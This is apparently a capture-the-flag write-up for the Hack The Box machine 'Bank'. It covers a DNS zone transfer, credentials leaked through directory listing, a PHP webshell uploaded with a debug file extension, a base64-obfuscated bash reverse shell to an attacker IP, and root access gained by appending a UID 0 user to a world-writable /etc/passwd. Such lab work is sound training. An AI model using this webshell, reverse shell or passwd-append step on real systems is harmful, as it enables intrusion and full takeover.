# Bank - HTB

[[_TOC_]]

## Summary

<!-- markdownlint-disable MD033 -->
<div align="center"><img src="images/0.png"></div>

Bank was a mediocre, easy-rated HTB machine created by [makelarisjr](https://app.hackthebox.com/users/95)

In this box, we abuse PHP directory listing to gather credentials.  
The credentials can be used on the website where we upload a PHP webshell for foothold.  
For root, we abuse the fact that `/etc/passwd` is writeable by everyone.

## Initial recon

```console
opcode@parrot$ nmap -v -p- 10.10.10.29
Nmap scan report for 10.10.10.29
Host is up (0.10s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
53/tcp open  domain
80/tcp open  http
```

```console
opcode@parrot$ nmap -sC -sV -p 22,53,80 -oN bank.nmap 10.10.10.29
Nmap scan report for 10.10.10.29
Host is up (0.092s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA)
|   2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA)
|   256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA)
|_  256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519)
53/tcp open  domain  ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.9.5-3ubuntu0.14-Ubuntu
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.7 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Besides the SSH port (22) and the HTTP port (80), we also have DNS (53) port exposed.

Visiting <http://10.10.10.29/> in a browser, we'd get the default Apache page.  
I tried enumerating routes with `ffuf`, but couldn't find anything.

Since port 53 is exposed, I tried using `nslookup` next:

```console
opcode@parrot$ nslookup
> server 10.10.10.29
Default server: 10.10.10.29
Address: 10.10.10.29#53
> 127.0.0.1
1.0.0.127.in-addr.arpa  name = localhost.
> 10.10.10.29
** server can't find 29.10.10.10.in-addr.arpa: NXDOMAIN
```

Nothing useful here. I also attempted zone transfer but met failure:

```console
opcode@parrot$ dig axfr @10.10.10.29         

; <<>> DiG 9.16.27-Debian <<>> axfr @10.10.10.29
; (1 server found)
;; global options: +cmd
;; Query time: 89 msec
;; SERVER: 10.10.10.29#53(10.10.10.29)
;; WHEN: Thu Aug 10 18:53:57 IST 2023
;; MSG SIZE  rcvd: 28
```

We can also attempt zone transfer, guessing the domain:

```console
opcode@parrot$ dig +noall +answer axfr @10.10.10.29 bank.htb               
bank.htb.      604800   IN SOA   bank.htb. chris.bank.htb. 5 604800 86400 2419200 604800
bank.htb.      604800   IN NS ns.bank.htb.
bank.htb.      604800   IN A  10.10.10.29
ns.bank.htb.      604800   IN A  10.10.10.29
www.bank.htb.     604800   IN CNAME bank.htb.
bank.htb.      604800   IN SOA   bank.htb. chris.bank.htb. 5 604800 86400 2419200 604800
```

It worked. We can add this line to `/etc/hosts`:

```text
10.10.10.29 bank.htb chris.bank.htb
```

<http://bank.htb/> redirects to <http://bank.htb/login.php> whereas <http://chris.bank.htb/> goes to Apache default page.

![1](images/1.png)

I tried `admin:admin` and basic SQL injection payloads on the login form, but they didn't work.

I tried enumerating other subdomains with `ffuf` but found none.  
I also enumerated routes with `ffuf` on <http://bank.htb/>:

```console
opcode@parrot$ ffuf -c -w ~/cybersec/wordlists/raft-small-words.txt -u http://bank.htb/FUZZ -e .php -fc 403 2>/dev/null
login.php               [Status: 200, Size: 1974, Words: 595, Lines: 52, Duration: 96ms]
logout.php              [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 91ms]
inc                     [Status: 301, Size: 301, Words: 20, Lines: 10, Duration: 88ms]
uploads                 [Status: 301, Size: 305, Words: 20, Lines: 10, Duration: 90ms]
assets                  [Status: 301, Size: 304, Words: 20, Lines: 10, Duration: 112ms]
support.php             [Status: 302, Size: 3291, Words: 784, Lines: 84, Duration: 89ms]
.                       [Status: 302, Size: 7322, Words: 3793, Lines: 189, Duration: 167ms]
index.php               [Status: 302, Size: 7322, Words: 3793, Lines: 189, Duration: 5181ms]
```

`/support.php` redirects to `/login.php` and `/uploads` returns 403 Forbidden.  
Visiting `/inc`, we'd learn that directory listing is enabled:

![2](images/2.png)

## Execution After Redirect (EAR)

This website is vulnerable to Execution After Redirect (EAR) vulnerability.  
<http://bank.htb> returns a 302 redirect to <http://bank.htb/login.php>, but also includes the whole body in that response.  
The developers likely forgot to use `die()`

We can intercept the request in `burp` and change the response code 302 to 200.  
After that, we'd be able to access the homepage in browser:

![3](images/3.png)

Although, nothing here is useful.

## Obtaining credentials

When this box came out, using the wordlist `directory-list-2.3-medium.txt` was the norm for directory enumeration.  
But in 2023, `raft-small-words.txt` is preferred.

Due to that difference, I missed a route `/balance-transfer`  
Visiting <http://bank.htb/balance-transfer/>, we'd find the directory listing of a bunch of `.acc` files.  
The filenames seem to be some sort of hash, and their contents seem to be encrypted and base64 encoded:

```console
opcode@parrot$ cat 06a80cb247151573c2731863af1e0f3f.acc 
++OK ENCRYPT SUCCESS
+=================+
| HTB Bank Report |
+=================+

===UserAccount===
Full Name: 0OUvBSZGw0qHLhrxKL5Wtq2IgyfwIHBJwwe8odOVeeD0w4xgQDdj4f2kOiQxZsgwYvEnIsjXHWXe1vuR8IbcYdxMwojvQA1P5GdO8wLQtJ4veznnhyAfM72ivmOmWQc2
Email: wpQFWCwqlAVzaiWsRwIDEKWa6Kw3AJ578VM5xivSTqs3JpvAVdezYaJ4Vg7vZcD88pdGHIzB91ESqatmoHWmSGrNWzjWMW5UliA319Fabj3CuwYSeUf6BGUygdu2aAXw
Password: SyAUIf5Ty8v3FuWTpb00SUy873bhD8OwHoqpDvjcEPfjkbdJndJf8ioflzxYImvqKVQnr9z6ZOqj0D2nRMDZ51fqBNpk9UKTQAgiKQoJFO2Fs53kSGjXHzojmNDwInqz
CreditCards: 5
Transactions: 105
Balance: 8668984 .
===UserAccount===

opcode@parrot$ echo 0OUvBSZGw0qHLhrxKL5Wtq2IgyfwIHBJwwe8odOVeeD0w4xgQDdj4f2kOiQxZsgwYvEnIsjXHWXe1vuR8IbcYdxMwojvQA1P5GdO8wLQtJ4veznnhyAfM72ivmOmWQc2 | base64 -d | xxd
00000000: d0e5 2f05 2646 c34a 872e 1af1 28be 56b6  ../.&F.J....(.V.
00000010: ad88 8327 f020 7049 c307 bca1 d395 79e0  ...'. pI......y.
00000020: f4c3 8c60 4037 63e1 fda4 3a24 3166 c830  ...`@7c...:$1f.0
00000030: 62f1 2722 c8d7 1d65 ded6 fb91 f086 dc61  b.'"...e.......a
00000040: dc4c c288 ef40 0d4f e467 4ef3 02d0 b49e  .L...@.O.gN.....
00000050: 2f7b 39e7 8720 1f33 bda2 be63 a659 0736  /{9.. .3...c.Y.6
```

The filenames appear to be hashes. We can collect them:

```console
opcode@parrot$ curl -s http://bank.htb/balance-transfer/ | grep -Po '(?<=acc">).+(?=.acc)' > hashes.txt
```

We can also attempt to crack them, but no dice:

```console
opcode@parrot$ john --wordlist=/usr/share/wordlists/rockyou.txt --format=LM hashes.txt
opcode@parrot$ john --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-MD5 hashes.txt
opcode@parrot$ john --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-MD4 hashes.txt
opcode@parrot$ john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT hashes.txt
```

If we visit the directory listing in a browser and sort them by size, `68576f20e9732f1b2edc4df5b8533230.acc` comes up on top, and its size is significantly lower than others.

```console
opcode@parrot$ cat 68576f20e9732f1b2edc4df5b8533230.acc 
--ERR ENCRYPT FAILED
+=================+
| HTB Bank Report |
+=================+

===UserAccount===
Full Name: Christos Christopoulos
Email: chris@bank.htb
Password: !##HTBB4nkP4ssw0rd!##
CreditCards: 5
Transactions: 39
Balance: 8842803 .
===UserAccount===
```

It seems to have a set of credentials:

```text
chris:!##HTBB4nkP4ssw0rd!##
```

I tested it for reuse on SSH but failed:

```console
opcode@parrot$ sshpass -p '!##HTBB4nkP4ssw0rd!##' ssh -o StrictHostKeyChecking=no chris@bank.htb
```

But it worked on the login page on the website.

## Uploading PHP webshell

On <http://bank.htb/support.php>, we can create support tickets and even upload files.  
I tried uploading a PHP webshell but got the error:

```text
You cant upload this this file. You can upload only images.
```

In the page source for `support.php`, we also have this line of comment:

```html
<!-- [DEBUG] I added the file extension .htb to execute as php for debugging purposes only [DEBUG] -->
```

Therefore, I created a file `webshell.htb` with the contents:

```php
<?php system($_SERVER['HTTP_USER_AGENT'])?>
```

I proceeded to upload it. The uploaded file can be accessed at <http://bank.htb/uploads/webshell.htb>  
We can run OS commands now:

```console
opcode@parrot$ curl http://bank.htb/uploads/webshell.htb -A 'id'
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

We can get a reverse shell with:

```console
opcode@parrot$ curl http://bank.htb/uploads/webshell.htb -A 'echo YmFzaCAtYyAnYmFzaCAtaSAgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTQ3LzkwMDEgMD4mMScK | base64 -d | bash'
```

We can now stabilize the shell:

```console
www-data@bank:/var/www$ python -c 'import pty;pty.spawn("/bin/bash");'
www-data@bank:/var/www$ ^Z
opcode@parrot$ stty raw -echo; fg
www-data@bank:/var/www$ export TERM=xterm-256color
www-data@bank:/var/www$ exec /bin/bash
```

## Exploring MySQL

Inside `/var/www/bank/inc/ticket.php`, we have this function:

```php
class Ticket{
   function createTicket($title, $msg, $username, $filename){
      $mysql = new mysqli("localhost", "root", "!@#S3cur3P4ssw0rd!@#", "htbbank");
      $title = $mysql->real_escape_string($title);
      $msg = $mysql->real_escape_string($msg);
      $username = $mysql->real_escape_string($username);
      $filename = "http://bank.htb/" . $filename;
      $mysql->query("INSERT INTO tickets(`creator`, `title`, `text`, `filename`) VALUES('$username', '$title', '$msg', '$filename')");
   }
```

These credentials can be used for mysql:

```console
www-data@bank:/var/www$ mysql --user=root --password='!@#S3cur3P4ssw0rd!@#'
mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| htbbank            |
| mysql              |
| performance_schema |
+--------------------+

mysql> use htbbank;

mysql> show tables;
+-------------------+
| Tables_in_htbbank |
+-------------------+
| creditcards       |
| tickets           |
| users             |
+-------------------+

mysql> select * from users\G
*************************** 1. row ***************************
      id: 1
username: Christos Christopoulos
   email: chris@bank.htb
password: b27179713f7bffc48b9ffd2cf9467620
 balance: 1.337
```

Sadly, we don't have any other user here.

## Privilege escalation by writing to `/etc/passwd`

We can run `linpeas.sh` on the box. It immediately finds tons of kernel exploits, but they should not be intended.  

It also finds that `/etc/passwd` is writable by everyone:

```console
opcode@parrot$ www-data@bank:/tmp$ ls -la /etc/passwd
-rw-rw-rw- 1 root root 1252 May 28  2017 /etc/passwd
```

Inside, we can add a root user `opcode`, with UID and GID 0:

```text
opcode:x:0:0::/root:/bin/bash
```

The `x` in there implies that the password hash is stored in `/etc/shadow`  
But we can directly use the hash instead as well.

We can generate a password using `mkpasswd`:

```console
opcode@parrot$ echo opcode | mkpasswd --method=md5 --password=0 --salt=10973731
$1$10973731$c3yxfS1TXNJnCaRlydvmP1
```

Therefore, the final line to be inserted is:

```text
opcode:$1$10973731$c3yxfS1TXNJnCaRlydvmP1:0:0::/root:/bin/bash
```

We can append it:

```console
www-data@bank:/var/www$ echo 'opcode:$1$10973731$c3yxfS1TXNJnCaRlydvmP1:0:0::/root:/bin/bash' >> /etc/passwd
```

And now, we can get a root shell:

```console
www-data@bank:/var/www$ su opcode
Password: 
root@bank:/var/www# id
uid=0(root) gid=0(root) groups=0(root)
```
